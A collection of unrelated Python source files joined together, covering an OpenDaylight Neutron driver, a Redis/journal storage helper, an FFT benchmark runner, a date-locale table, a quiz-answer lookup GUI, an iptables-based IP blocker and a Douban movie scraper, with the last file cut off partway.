# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import six
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
import requests
from neutron.common import exceptions as n_exc
from neutron.common import utils
from neutron import context
from neutron.extensions import securitygroup as sg
from neutron.plugins.ml2 import driver_context
from networking_odl.common import callback as odl_call
from networking_odl.common import client as odl_client
from networking_odl.common import constants as odl_const
from networking_odl.common import utils as odl_utils
from networking_odl.openstack.common._i18n import _LE
LOG = logging.getLogger(__name__)
not_found_exception_map = {odl_const.ODL_NETWORKS: n_exc.NetworkNotFound,
odl_const.ODL_SUBNETS: n_exc.SubnetNotFound,
odl_const.ODL_PORTS: n_exc.PortNotFound,
odl_const.ODL_SGS: sg.SecurityGroupNotFound,
odl_const.ODL_SG_RULES:
sg.SecurityGroupRuleNotFound}
@six.add_metaclass(abc.ABCMeta)
class ResourceFilterBase(object):
@staticmethod
@abc.abstractmethod
def filter_create_attributes(resource, context):
pass
@staticmethod
@abc.abstractmethod
def filter_update_attributes(resource, context):
pass
@staticmethod
@abc.abstractmethod
def filter_create_attributes_with_plugin(resource, plugin, dbcontext):
pass
class NetworkFilter(ResourceFilterBase):
@staticmethod
def filter_create_attributes(network, context):
"""Filter out network attributes not required for a create."""
odl_utils.try_del(network, ['status', 'subnets'])
@staticmethod
def filter_update_attributes(network, context):
"""Filter out network attributes for an update operation."""
odl_utils.try_del(network, ['id', 'status', 'subnets', 'tenant_id'])
@classmethod
def filter_create_attributes_with_plugin(cls, network, plugin, dbcontext):
context = driver_context.NetworkContext(plugin, dbcontext, network)
cls.filter_create_attributes(network, context)
class SubnetFilter(ResourceFilterBase):
@staticmethod
def filter_create_attributes(subnet, context):
"""Filter out subnet attributes not required for a create."""
pass
@staticmethod
def filter_update_attributes(subnet, context):
"""Filter out subnet attributes for an update operation."""
odl_utils.try_del(subnet, ['id', 'network_id', 'ip_version', 'cidr',
'allocation_pools', 'tenant_id'])
@classmethod
def filter_create_attributes_with_plugin(cls, subnet, plugin, dbcontext):
context = driver_context.SubnetContext(subnet, plugin, dbcontext)
cls.filter_create_attributes(subnet, context)
class PortFilter(ResourceFilterBase):
@staticmethod
def _add_security_groups(port, context):
"""Populate the 'security_groups' field with entire records."""
dbcontext = context._plugin_context
groups = [context._plugin.get_security_group(dbcontext, sg)
for sg in port['security_groups']]
port['security_groups'] = groups
@classmethod
def filter_create_attributes(cls, port, context):
"""Filter out port attributes not required for a create."""
cls._add_security_groups(port, context)
# TODO(kmestery): Converting to uppercase due to ODL bug
# https://bugs.opendaylight.org/show_bug.cgi?id=477
port['mac_address'] = port['mac_address'].upper()
odl_utils.try_del(port, ['status'])
# NOTE(yamahata): work around for port creation for router
# tenant_id=''(empty string) is passed when port is created
# by l3 plugin internally for router.
# On the other hand, ODL doesn't accept empty string for tenant_id.
# In that case, deduce tenant_id from network_id for now.
# Right fix: modify Neutron so that don't allow empty string
# for tenant_id even for port for internal use.
# TODO(yamahata): eliminate this work around when neutron side
# is fixed
# assert port['tenant_id'] != ''
if port['tenant_id'] == '':
LOG.debug('empty string was passed for tenant_id: %s(port)', port)
port['tenant_id'] = context._network_context._network['tenant_id']
@classmethod
def filter_update_attributes(cls, port, context):
"""Filter out port attributes for an update operation."""
cls._add_security_groups(port, context)
odl_utils.try_del(port, ['network_id', 'id', 'status', 'mac_address',
'tenant_id', 'fixed_ips'])
@classmethod
def filter_create_attributes_with_plugin(cls, port, plugin, dbcontext):
network = plugin.get_network(dbcontext, port['network_id'])
# TODO(yamahata): port binding
binding = {}
context = driver_context.PortContext(
plugin, dbcontext, port, network, binding, None)
cls.filter_create_attributes(port, context)
class SecurityGroupFilter(ResourceFilterBase):
@staticmethod
def filter_create_attributes(sg, context):
"""Filter out security-group attributes not required for a create."""
pass
@staticmethod
def filter_update_attributes(sg, context):
"""Filter out security-group attributes for an update operation."""
pass
@staticmethod
def filter_create_attributes_with_plugin(sg, plugin, dbcontext):
pass
class SecurityGroupRuleFilter(ResourceFilterBase):
@staticmethod
def filter_create_attributes(sg_rule, context):
"""Filter out sg-rule attributes not required for a create."""
pass
@staticmethod
def filter_update_attributes(sg_rule, context):
"""Filter out sg-rule attributes for an update operation."""
pass
@staticmethod
def filter_create_attributes_with_plugin(sg_rule, plugin, dbcontext):
pass
class OpenDaylightDriver(object):
"""OpenDaylight Python Driver for Neutron.
This code is the backend implementation for the OpenDaylight ML2
MechanismDriver for OpenStack Neutron.
"""
FILTER_MAP = {
odl_const.ODL_NETWORKS: NetworkFilter,
odl_const.ODL_SUBNETS: SubnetFilter,
odl_const.ODL_PORTS: PortFilter,
odl_const.ODL_SGS: SecurityGroupFilter,
odl_const.ODL_SG_RULES: SecurityGroupRuleFilter,
}
out_of_sync = True
def __init__(self):
LOG.debug("Initializing OpenDaylight ML2 driver")
self.client = odl_client.OpenDaylightRestClient(
cfg.CONF.ml2_odl.url,
cfg.CONF.ml2_odl.username,
cfg.CONF.ml2_odl.password,
cfg.CONF.ml2_odl.timeout
)
self.sec_handler = odl_call.OdlSecurityGroupsHandler(self)
def synchronize(self, operation, object_type, context):
"""Synchronize ODL with Neutron following a configuration change."""
if self.out_of_sync:
self.sync_full(context._plugin)
else:
self.sync_single_resource(operation, object_type, context)
def sync_resources(self, plugin, dbcontext, collection_name):
"""Sync objects from Neutron over to OpenDaylight.
This will handle syncing networks, subnets, and ports from Neutron to
OpenDaylight. It also filters out the requisite items which are not
valid for create API operations.
"""
filter_cls = self.FILTER_MAP[collection_name]
to_be_synced = []
obj_getter = getattr(plugin, 'get_%s' % collection_name)
if collection_name == odl_const.ODL_SGS:
resources = obj_getter(dbcontext, default_sg=True)
else:
resources = obj_getter(dbcontext)
for resource in resources:
try:
# Convert underscores to dashes in the URL for ODL
collection_name_url = collection_name.replace('_', '-')
urlpath = collection_name_url + '/' + resource['id']
self.client.sendjson('get', urlpath, None)
except requests.exceptions.HTTPError as e:
with excutils.save_and_reraise_exception() as ctx:
if e.response.status_code == requests.codes.not_found:
filter_cls.filter_create_attributes_with_plugin(
resource, plugin, dbcontext)
to_be_synced.append(resource)
ctx.reraise = False
else:
# TODO(yamahata): compare result with resource.
# If they don't match, update it below
pass
key = collection_name[:-1] if len(to_be_synced) == 1 else (
collection_name)
# Convert underscores to dashes in the URL for ODL
collection_name_url = collection_name.replace('_', '-')
self.client.sendjson('post', collection_name_url, {key: to_be_synced})
# https://bugs.launchpad.net/networking-odl/+bug/1371115
# TODO(yamahata): update resources with unsyned attributes
# TODO(yamahata): find dangling ODL resouce that was deleted in
# neutron db
@utils.synchronized('odl-sync-full')
def sync_full(self, plugin):
"""Resync the entire database to ODL.
Transition to the in-sync state on success.
Note: we only allow a single thread in here at a time.
"""
if not self.out_of_sync:
return
dbcontext = context.get_admin_context()
for collection_name in [odl_const.ODL_NETWORKS,
odl_const.ODL_SUBNETS,
odl_const.ODL_PORTS,
odl_const.ODL_SGS,
odl_const.ODL_SG_RULES]:
self.sync_resources(plugin, dbcontext, collection_name)
self.out_of_sync = False
def sync_single_resource(self, operation, object_type, context):
"""Sync over a single resource from Neutron to OpenDaylight.
Handle syncing a single operation over to OpenDaylight, and correctly
filter attributes out which are not required for the requisite
operation (create or update) being handled.
"""
# Convert underscores to dashes in the URL for ODL
object_type_url = object_type.replace('_', '-')
try:
obj_id = context.current['id']
if operation == odl_const.ODL_DELETE:
self.out_of_sync |= not self.client.try_delete(
object_type_url + '/' + obj_id)
else:
filter_cls = self.FILTER_MAP[object_type]
if operation == odl_const.ODL_CREATE:
urlpath = object_type_url
method = 'post'
attr_filter = filter_cls.filter_create_attributes
elif operation == odl_const.ODL_UPDATE:
urlpath = object_type_url + '/' + obj_id
method = 'put'
attr_filter = filter_cls.filter_update_attributes
resource = context.current.copy()
attr_filter(resource, context)
self.client.sendjson(method, urlpath,
{object_type_url[:-1]: resource})
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Unable to perform %(operation)s on "
"%(object_type)s %(object_id)s"),
{'operation': operation,
'object_type': object_type,
'object_id': obj_id})
self.out_of_sync = True
def sync_from_callback(self, operation, object_type, res_id,
resource_dict):
try:
if operation == odl_const.ODL_DELETE:
self.out_of_sync |= not self.client.try_delete(
object_type + '/' + res_id)
else:
if operation == odl_const.ODL_CREATE:
urlpath = object_type
method = 'post'
elif operation == odl_const.ODL_UPDATE:
urlpath = object_type + '/' + res_id
method = 'put'
self.client.sendjson(method, urlpath, resource_dict)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE("Unable to perform %(operation)s on "
"%(object_type)s %(res_id)s %(resource_dict)s"),
{'operation': operation,
'object_type': object_type,
'res_id': res_id,
'resource_dict': resource_dict})
self.out_of_sync = True
|
StarcoderdataPython
|
3376461
|
<gh_stars>1-10
#!/usr/bin/env python
# -*- coding: utf-8 -*-
def check(height):
if height >= 160:
return "John"
else:
return "Michel"
name = "who"
print(name)
h = 170
name = check(h)
print(name)
|
StarcoderdataPython
|
119970
|
<gh_stars>1-10
#! /usr/bin/env python3
import os
import string
import time
from pathlib import Path
from subprocess import Popen, DEVNULL
def start_openocd():
cmd = ["openocd", "-f", "interface/stlink-v2-1.cfg", "-f", "target/stm32f3x.cfg"]
proc = Popen(cmd, stdout=DEVNULL, stderr=DEVNULL)
time.sleep(1)
return proc
def run_bench(name, size):
output_file = Path("itm.txt")
output_file.touch(exist_ok=False)
features = f"{name},n-{size}"
cmd = ["cargo", "run", "--release", "--features", features]
proc = Popen(cmd, stdout=DEVNULL, stderr=DEVNULL)
try:
output = wait_for_file(output_file)
finally:
proc.terminate()
output_file.unlink()
cycles = parse_output(output)
print(f"({name}, {size}): {cycles}")
def wait_for_file(path):
while True:
contents = path.read_bytes()
if contents:
return contents
time.sleep(0.1)
def parse_output(output):
chars = (chr(b) for b in output)
printable = (c for c in chars if c in string.printable)
return "".join(printable)
def run_benches():
for i in range(2, 13):
run_bench("microfft-c", 2 ** i)
for i in range(2, 13):
run_bench("microfft-r", 2 ** i)
for i in range(2, 10):
run_bench("fourier-c", 2 ** i)
def main():
bench_path = Path(__file__).resolve().parent
os.chdir(bench_path)
openocd = start_openocd()
try:
run_benches()
finally:
openocd.terminate()
openocd.terminate()
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
188391
|
# coding: utf-8
import os
import glob
import time
import json
from copy import copy
import redis
from lib.tools.s_logger import S_logger
import config as CONF
class Tools_data:
# pool
def redis_pool(self, SCRenv):
try:
pool = redis.ConnectionPool(
host=CONF.REDIS['address'],
port=CONF.REDIS['port'],
db=CONF.REDIS['db'],
decode_responses=True)
rp = redis.StrictRedis(connection_pool=pool)
rp.keys()
except:
#SCRenv['log'].output("Boot to journal mode.", level='DEBUG', SCRenv={'module':'SCR'})
return 'journal'
#SCRenv['log'].output("Boot to redis mode.", level='DEBUG', SCRenv={'module':'SCR'})
return pool
def redis_con(self):
r = redis.StrictRedis(
host=CONF.REDIS['address'],
port=CONF.REDIS['port'],
db=CONF.REDIS['db'],
decode_responses=True)
return r
# serch and get data
# return <jsonstr>
def get_data(self, SCRfield, SCRenv, ty):
# field data is only journal
if ty == 'fi':
if(os.path.exists('journal/scr_f')):
with open('journal/scr_f') as f:
data_str = f.read()
else:
return False
else:
key = '_'.join(['scr', str(SCRfield['state']['fid']), str(SCRfield['state']['myid']), ty])
if type(SCRenv['pool']) == redis.connection.ConnectionPool:
re = redis.StrictRedis(connection_pool=SCRenv['pool'])
if(re.exists(key)):
if(ty == 'sp'):
return re.smembers(key)
else:
data_str = re.get(key)
else:
if(ty == 'sp'):
return set([])
return []
if SCRenv['pool'] == 'journal':
if(os.path.exists('journal/' + key)):
with open('journal/' + key) as f:
data_str = f.read()
else:
return False
#print(data_str)
de = json.JSONDecoder()
return de.decode(data_str.replace('\'','\"'))
def pop_receive_data(self, SCRfield, SCRenv):
data_list = []
if type(SCRenv['pool']) == redis.connection.ConnectionPool:
key = '_'.join(['scr', str(SCRfield['state']['fid']), str(SCRfield['state']['myid']), 're'])
try:
re = redis.StrictRedis(connection_pool=SCRenv['pool'])
if(0 < re.llen(key)):
low = re.llen(key)
data_list += re.lrange(key, 0, low - 1)
re.ltrim(key, low, -1)
except:
#SCRenv['log'].output("failed receive.", level='DEBUG', SCRenv=SCRenv)
return False
re_files = glob.glob('journal/*_re_*')
if(len(re_files) != 0):
try:
for ref in re_files:
with open(ref) as f:
data_str = f.read()
data_list += data_str.split('\n')
os.remove(ref)
except:
#SCRenv['log'].output("failed receive from journal.", level='DEBUG', SCRenv=SCRenv)
return False
if(len(data_list) == 0):
return False
de = json.JSONDecoder()
data_dic_list = []
for re in data_list:
data_dic_list.append(de.decode(re.replace('\'','\"')))
return data_dic_list
# 指定されたデータを作成する
# return <bool>
def create_data(self, SCRfield, SCRenv, data, ty):
if ty == 'fi':
with open('journal/scr_f', 'w') as f:
f.write(json.dumps(data))
return True
else:
key = '_'.join(['scr', str(SCRfield['state']['fid']), str(SCRfield['state']['myid']), ty])
c_data = copy(data)
if(ty == 'en'):
del c_data['pool']
del c_data['i']
del c_data['log']
if(type(SCRenv['pool']) == redis.connection.ConnectionPool):
c_data['pool'] = 'redis_pool'
else:
c_data['pool'] = 'journal'
if type(SCRenv['pool']) == redis.connection.ConnectionPool:
try:
re = redis.StrictRedis(connection_pool=SCRenv['pool'])
re.set(key, json.dumps(c_data))
except:
SCRenv['log'].output(lv='DEBUG', log="failed set " + key + " data.")
return False
elif SCRenv['pool'] == 'journal':
try:
if(os.path.exists('journal/' + key)):
os.remove('journal/' + key)
with open('journal/' + key, 'w') as f:
f.write(json.dumps(c_data))
except:
#SCRenv['log'].output("failed write " + key + " journal data.", level='DEBUG', SCRenv=SCRenv)
return False
return True
# 指定されたデータを消去する
# return <bool>
def truncate_data(self, SCRfield, SCRenv, ty):
key = '_'.join(['scr', str(SCRfield['state']['fid']), str(SCRfield['state']['myid']), ty])
if type(SCRenv['pool']) == redis.connection.ConnectionPool:
try:
re = redis.StrictRedis(connection_pool=SCRenv['pool'])
re.delete(key)
except:
#SCRenv['log'].output("failed truncate " + key + ".", level='DEBUG', SCRenv=SCRenv)
return False
elif SCRenv['pool'] == 'journal':
try:
os.remove('journal/' + key)
except:
#SCRenv['log'].output("failed truncate " + key + ".", level='DEBUG', SCRenv=SCRenv)
return False
return True
def insert_spe(self, SCRfield, SCRenv, data):
key = '_'.join(['scr', str(SCRfield['state']['fid']), str(SCRfield['state']['myid']), 'sp'])
if type(SCRenv['pool']) == redis.connection.ConnectionPool:
try:
re = redis.StrictRedis(connection_pool=SCRenv['pool'])
return re.sadd(key, data)
except:
#SCRenv['log'].output("failed truncate " + key + ".", level='DEBUG', SCRenv=SCRenv)
return False
def insert_receive(self, SCRfield, rc, receive):
key = '_'.join(['scr', str(SCRfield['state']['fid']), str(SCRfield['state']['myid']), 're'])
rc.rpush(key, json.dumps(receive))
|
StarcoderdataPython
|
3364892
|
<reponame>bcgov/wps-api
""" Code common to app.models.fetch """
from enum import Enum
class ModelEnum(str, Enum):
""" Enumerator for different kinds of supported weather models """
GDPS = "GDPS"
|
StarcoderdataPython
|
1612698
|
# -*- coding: utf-8 -*-
info = {
"name": "kde",
"date_order": "DMY",
"january": [
"mwedi ntandi",
"jan"
],
"february": [
"mwedi wa pili",
"feb"
],
"march": [
"mwedi wa tatu",
"mac"
],
"april": [
"mwedi wa nchechi",
"apr"
],
"may": [
"mwedi wa nnyano",
"mei"
],
"june": [
"mwedi wa nnyano na umo",
"jun"
],
"july": [
"mwedi wa nnyano na mivili",
"jul"
],
"august": [
"mwedi wa nnyano na mitatu",
"ago"
],
"september": [
"mwedi wa nnyano na nchechi",
"sep"
],
"october": [
"mwedi wa nnyano na nnyano",
"okt"
],
"november": [
"mwedi wa nnyano na nnyano na u",
"nov"
],
"december": [
"mwedi wa nnyano na nnyano na m",
"des"
],
"monday": [
"liduva lyatatu",
"ll3"
],
"tuesday": [
"liduva lyanchechi",
"ll4"
],
"wednesday": [
"liduva lyannyano",
"ll5"
],
"thursday": [
"liduva lyannyano na linji",
"ll6"
],
"friday": [
"liduva lyannyano na mavili",
"ll7"
],
"saturday": [
"liduva litandi",
"ll1"
],
"sunday": [
"liduva lyapili",
"ll2"
],
"am": [
"muhi"
],
"pm": [
"chilo"
],
"year": [
"mwaka"
],
"month": [
"mwedi"
],
"week": [
"lijuma"
],
"day": [
"lihiku"
],
"hour": [
"saa"
],
"minute": [
"dakika"
],
"second": [
"sekunde"
],
"relative-type": {
"1 year ago": [
"last year"
],
"0 year ago": [
"this year"
],
"in 1 year": [
"next year"
],
"1 month ago": [
"last month"
],
"0 month ago": [
"this month"
],
"in 1 month": [
"next month"
],
"1 week ago": [
"last week"
],
"0 week ago": [
"this week"
],
"in 1 week": [
"next week"
],
"1 day ago": [
"lido"
],
"0 day ago": [
"nelo"
],
"in 1 day": [
"nundu"
],
"0 hour ago": [
"this hour"
],
"0 minute ago": [
"this minute"
],
"0 second ago": [
"now"
]
},
"locale_specific": {},
"skip": [
" ",
".",
",",
";",
"-",
"/",
"'",
"|",
"@",
"[",
"]",
","
]
}
|
StarcoderdataPython
|
1660799
|
<gh_stars>1-10
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function
from numpy import array
import pytest
from PyDSTool import Point
from PyDSTool.Generator import LookupTable
def test_can_build_lookup_table_and_use_it_for_known_values():
"""Functional (a.k.a acceptance) test for LookupTable"""
# John prepares data to be looked up
ts = array([0.1, 1.1, 2.1])
x1 = array([10.2, -1.4, 4.1])
x2 = array([0.1, 0.01, 0.4])
# John calculates "trajectory" for his data
table = LookupTable({
'name': 'lookup',
'tdata': ts,
'ics': dict(zip(['x1', 'x2'], [x1, x2])),
})
traj = table.compute('ltable')
# Now John can retrieve his values from table
for i, t in enumerate(ts):
assert traj(t) == Point({'coordnames': ['x1', 'x2'], 'coordarray': [x1[i], x2[i]]})
assert traj(t, 'x1') == Point({'x1': x1[i]})
assert traj(t, 'x2') == Point({'x2': x2[i]})
# John can get only those values, that he has previously inserted
with pytest.raises(ValueError):
traj(0.4)
with pytest.raises(ValueError):
traj(0.4, 'x1')
with pytest.raises(ValueError):
traj(0.4, 'x2')
|
StarcoderdataPython
|
37710
|
<filename>scripts/review_weblog.py
"""Process what our weblog has.
Run every minute, sigh.
"""
import sys
import subprocess
import psycopg2
THRESHOLD = 30
def logic(counts, family):
"""Should we or should we not, that is the question."""
exe = "iptables" if family == 4 else "ip6tables"
for addr, hits in counts.items():
if len(hits) < THRESHOLD or addr == '127.0.0.1':
continue
# NOTE the insert to the front of the chain
cmd = f"/usr/sbin/{exe} -I INPUT -s {addr} -j DROP"
print(f"{addr} with {len(hits)}/{THRESHOLD} 404s\n{cmd}\nSample 10\n")
for hit in hits[:10]:
print(f"{hit[0]} uri:|{hit[2]}| ref:|{hit[3]}|")
print()
subprocess.call(cmd, shell=True)
def main(argv):
"""Go Main Go."""
family = int(argv[1]) # either 4 or 6
pgconn = psycopg2.connect(
database="mesosite",
host="iemdb-mesosite.local",
user="nobody",
connect_timeout=5,
# gssencmode="disable",
)
cursor = pgconn.cursor()
cursor.execute(
"SELECT valid, client_addr, uri, referer from weblog WHERE "
"http_status = 404 and family(client_addr) = %s ORDER by valid ASC",
(family,),
)
valid = None
counts = {}
for row in cursor:
d = counts.setdefault(row[1], [])
d.append(row)
valid = row[0]
if valid is None:
return
cursor.execute(
"DELETE from weblog where valid <= %s and family(client_addr) = %s",
(valid, family),
)
cursor.close()
pgconn.commit()
logic(counts, family)
if __name__ == "__main__":
main(sys.argv)
|
StarcoderdataPython
|
3386612
|
<gh_stars>10-100
from PyQt5.QtWidgets import QMessageBox, QTreeWidgetItem
from PyQt5.QtGui import QColor, QBrush, QPalette, QFont
from PyQt5.QtCore import QObject, Qt, pyqtSignal
import asyncio
import re
from base.https.tassomai import Tassomai
from base.common import gather_answers
class Lookup:
def __init__(self, base):
self.ui = base
self.tree = self.ui.ui.tree
self.database = self.ui.database.all()
def check_begin(self):
if self.ui.ui.question:
asyncio.run(self.search())
else:
asyncio.run(self.check())
async def check(self):
if self.ui.ui.quiz_url.text().__contains__('courseId=') and self.ui.ui.quiz_url.text().__contains__('playlistId='):
try:
tassomai = Tassomai({})
discipline = int(re.search('\d', self.ui.ui.quiz_url.text())[0])
tassomai.set_discipline(discipline)
email = self.ui.ui.emailTassomai.text()
password = self.ui.ui.password<PASSWORD>.text()
login = await tassomai.login(email, password)
if login == 'error':
msg = QMessageBox()
msg.setWindowTitle("An error occured")
msg.setText("Failed to login to Tassomai.")
msg.setInformativeText("Invalid credentials maybe?")
msg.setIcon(QMessageBox.Warning)
msg.setStandardButtons(QMessageBox.Ok)
msg.setDefaultButton(QMessageBox.Ok)
msg.exec_()
return
courseId = int(re.search('courseId=\d+', self.ui.ui.quiz_url.text())[0].strip('courseId='))
playlistId = int(re.search('playlistId=\d+', self.ui.ui.quiz_url.text())[0].strip('playlistId='))
data = await tassomai.special_extract(courseId, playlistId)
for q in data['questions']: # removing double spaces
q['text'] = q['text'].replace(" ", " ")
for ie, ans in enumerate(q['answers']):
q['answers'][ie]['text'] = ans['text'].replace(" ", " ")
data['questions'] = list(sorted(data['questions'], key=lambda k: k['text'])) # sorting the questions in alphabetical order
await self.lookup(data)
except:
msg = QMessageBox()
msg.setWindowTitle("An error occured")
msg.setText("An unknown error occured.")
msg.setIcon(QMessageBox.Warning)
msg.setStandardButtons(QMessageBox.Ok)
msg.setDefaultButton(QMessageBox.Ok)
msg.exec_()
else:
print("e")
msg = QMessageBox()
msg.moveToThread(self.ui.lookup_thread)
msg.setWindowTitle("An error occured")
msg.setText("Invalid quiz URL.")
msg.setIcon(QMessageBox.Warning)
msg.setStandardButtons(QMessageBox.Ok)
msg.setDefaultButton(QMessageBox.Ok)
msg.exec_()
async def search(self):
self.ui.ui.tree.clear()
question = self.ui.ui.quiz_url.text().strip()
if question == "":
msg = QMessageBox()
msg.setWindowTitle("An error occured")
msg.setText("Input required.")
msg.setIcon(QMessageBox.Warning)
msg.setStandardButtons(QMessageBox.Ok)
msg.setDefaultButton(QMessageBox.Ok)
msg.exec_()
return
data = list(filter(lambda k: k.lower().startswith(question.lower()), self.database))
for question in data:
item = QTreeWidgetItem([question])
self.tree.addTopLevelItem(item)
red_brush = QBrush(QColor(155, 0, 0))
green_brush = QBrush(QColor(0, 155, 0))
blue_brush = QBrush(QColor(30, 59, 166))
brush = green_brush
answers = list(self.database[question].keys())
for answer_set in answers:
answers_list = eval(answer_set)
a = self.database[question][answer_set]
current_answers = list(a.keys()) if type(a) == dict else [a]
for answer in answers_list:
child = QTreeWidgetItem(['• ' + answer])
if answer in current_answers:
brush = green_brush
else:
brush = red_brush
child.setForeground(0, brush)
item.addChild(child)
if answers.index(answer_set)+1 < len(answers):
brush = blue_brush
child = QTreeWidgetItem(['-------- OTHER SET OF ANSWERS TO QUESTION --------'])
child.setForeground(0, brush)
item.addChild(child)
async def lookup(self, data):
top = QTreeWidgetItem([data['title']])
font = QFont()
font.setBold(True)
top.setFont(0, font)
self.tree.addTopLevelItem(top)
for index, question in enumerate(data['questions'], start=1):
item = QTreeWidgetItem([f'{index}. ' + question['text']])
top.addChild(item)
red_brush = QBrush(QColor(155, 0, 0))
green_brush = QBrush(QColor(0, 155, 0))
brush = green_brush
answers = []
current_answers = str(gather_answers(question['answers']))
if question['text'] in self.database:
if current_answers in self.database[question['text']]:
db = self.database[question['text']][current_answers]
answers = list(db.keys()) if type(db) == dict else [db]
for answer in question['answers']:
child = QTreeWidgetItem(['• ' + answer['text']])
if len(answers) == 0:
brush = green_brush
elif answer['text'] in answers:
brush = green_brush
else:
brush = red_brush
child.setForeground(0, brush)
item.addChild(child)
class ExtraLookup(QObject, Lookup):
showSubject = pyqtSignal(list)
def __init__(self, base, parent=None):
super().__init__(base=base, parent=parent)
def extra_begin(self):
asyncio.run(self.extra())
async def extra(self):
tassomai = Tassomai({})
email = self.ui.ui.emailTassomai.text()
password = self.ui.ui.passwordTassomai.text()
login = await tassomai.login(email, password)
if login == 'error':
self.ui.ui.extra_lookup.setDisabled(True)
text = self.ui.ui.info_label.text()
self.ui.ui.info_label.setText("INVALID CREDENTIALS")
palette = QPalette()
brush = QBrush(QColor(181, 21, 21))
brush.setStyle(Qt.SolidPattern)
palette.setBrush(QPalette.Active, QPalette.WindowText, brush)
palette.setBrush(QPalette.Inactive, QPalette.WindowText, brush)
self.ui.ui.info_label.setPalette(palette)
self.thread().sleep(2)
palette = QPalette()
brush = QBrush(QColor(30, 59, 166))
brush.setStyle(Qt.SolidPattern)
palette.setBrush(QPalette.Active, QPalette.WindowText, brush)
palette.setBrush(QPalette.Inactive, QPalette.WindowText, brush)
self.ui.ui.info_label.setPalette(palette)
self.ui.ui.info_label.setText(text)
self.ui.ui.extra_lookup.setDisabled(False)
return
disciplines = await tassomai.extract_disciplines()
tassomai.set_discipline(disciplines[0]['id']) # just in case for some reason the only subject's discipline ID isn't equal to 1
if len(disciplines) > 1:
self.showSubject.emit(disciplines)
await asyncio.sleep(1.00)
while not self.ui.subject.done: # Waiting for user to choose subject and adding time wait between each loop to avoid crash
await asyncio.sleep(0.10)
tassomai.set_discipline(self.ui.subject.discipline)
quizzes = await tassomai.extract_extra_data()
for quiz in quizzes['quizzes']:
data = await tassomai.special_extract(quiz['courseId'], quiz['playlistId'])
for q in data['questions']:
q['text'] = q['text'].replace(" ", " ")
for ie, ans in enumerate(q['answers']):
q['answers'][ie]['text'] = ans['text'].replace(" ", " ")
data['questions'] = list(sorted(data['questions'], key=lambda k: k['text']))
await self.lookup(data)
|
StarcoderdataPython
|
133889
|
"""Top level for tools."""
from .autocorrelation import compute_morans_i
from .branch_length_estimator import IIDExponentialBayesian, IIDExponentialMLE
from .small_parsimony import fitch_count, fitch_hartigan, score_small_parsimony
from .topology import compute_expansion_pvalues
|
StarcoderdataPython
|
3364457
|
# -*- coding: utf-8 -*-
import bs4, pyexcel_xls, random, re, requests, time
from tqdm import tqdm
from collections import OrderedDict
data_save = OrderedDict()
actor_name = []
actor_id = []
actor_movie_count = []
headers = { # 请求头
'Host': 'movie.douban.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0',
'Accept': '*/*',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate, br',
'Referer': 'https://movie.douban.com/',
'DNT': '1',
'Connection': 'close'}
def get_actor_name():
data_source = pyexcel_xls.get_data('dataSource.xls')['actorList']
for row in tqdm(range(1, len(data_source))):
actor_name.append(data_source[row][0])
print(actor_name)
def get_actor_id():
url = 'https://movie.douban.com/j/subject_suggest'
for name in tqdm(actor_name):
sleep_momment()
params = {'q': name}
r = requests.get(url, params=params, headers=headers, timeout=2)
for j in r.json():
if j['type'] == 'celebrity':
actor_id.append(j['id'])
break
print(actor_id)
def save_actor_id():
datas = []
datas.append(['index', 'name', 'id'])
for i in range(len(actor_name)):
datas.append([str(i+1), actor_name[i], actor_id[i]])
data_save.update({'actorId': datas})
def get_actor_movie_count():
for id_ in actor_id:
sleep_momment()
url = 'https://movie.douban.com/celebrity/' + id_ + '/movies'
params = {'sortby': 'time', 'start': '0', 'format': 'text', 'role': 'A1'}
r = requests.get(url, params=params, headers=headers, timeout=2)
soup = bs4.BeautifulSoup(r.text, features='lxml')
tag_count = soup.find('h1')
text_count = re.search(r'(作品)\s*\((\S*)\)', tag_count.text).group(2)
actor_movie_count.append(int(text_count))
print(actor_movie_count)
def save_actor_movie_count():
datas = []
datas.append(['index', 'name', 'id', 'movieCount'])
for i in range(len(actor_name)):
datas.append([str(i+1), actor_name[i], actor_id[i], actor_movie_count[i]])
data_save.update({'actorMovieCount': datas})
def get_actor_movie_info():
index = 0
for id_ in actor_id:
if (index>=0):
print(index, '\t', id_, '\t', actor_name[index])
sleep_momment(2, 3)
url = 'https://movie.douban.com/celebrity/' + id_ + '/movies'
pages = actor_movie_count[index] // 25 + 1
movie_href = []
for page in range(pages):
sleep_momment(2, 3)
params = {'sortby': 'time', 'start': str(page*25), 'format': 'text', 'role': 'A1'}
r = requests.get(url, params=params, headers=headers, timeout=5)
r.encoding = 'UTF-8'
soup = bs4.BeautifulSoup(r.text, features='lxml')
tag_movie = soup.find_all(headers='m_name')
for tag in tag_movie:
text_href = tag.a['href']
id_href = re.search(r'(subject/)(\d*)/', text_href).group(2)
movie_href.append('https://movie.douban.com/subject/'+id_href)
movie_data = []
movie_data.append(['title', 'genres', 'year', 'rating'])
for href in tqdm(movie_href):
sleep_momment()
url = href
r = requests.get(url, params=params, headers=headers)
soup = bs4.BeautifulSoup(r.text, features='lxml')
tag_title = soup.find(property='v:itemreviewed')
tag_genres = soup.find_all(property='v:genre')
tag_year = soup.find(class_='year')
tag_rating = soup.find(property='v:average')
try:
text_title = tag_title.text
text_genres = []
for genres in tag_genres:
text_genres.append(genres.text)
text_year = tag_year.text
text_rating = tag_rating.text
except:
text_title = '/'
text_genres = ['/']
text_year = '/'
text_rating = '/'
print('\n', id_, href, '爬取失败!')
movie_data.append([text_title, ','.join(text_genres), text_year, text_rating])
movie_save = OrderedDict()
movie_save.update({'actorMovies': movie_data})
pyexcel_xls.save_data('datas/'+id_+' '+actor_name[actor_id.index(id_)]+'.xls', movie_save)
index += 1
def save_all_data():
pyexcel_xls.save_data('dataSummary.xls', data_save)
def sleep_momment(time_a=0.1, time_b=0.2):
time.sleep(random.uniform(time_a, time_b))
if __name__ == '__main__':
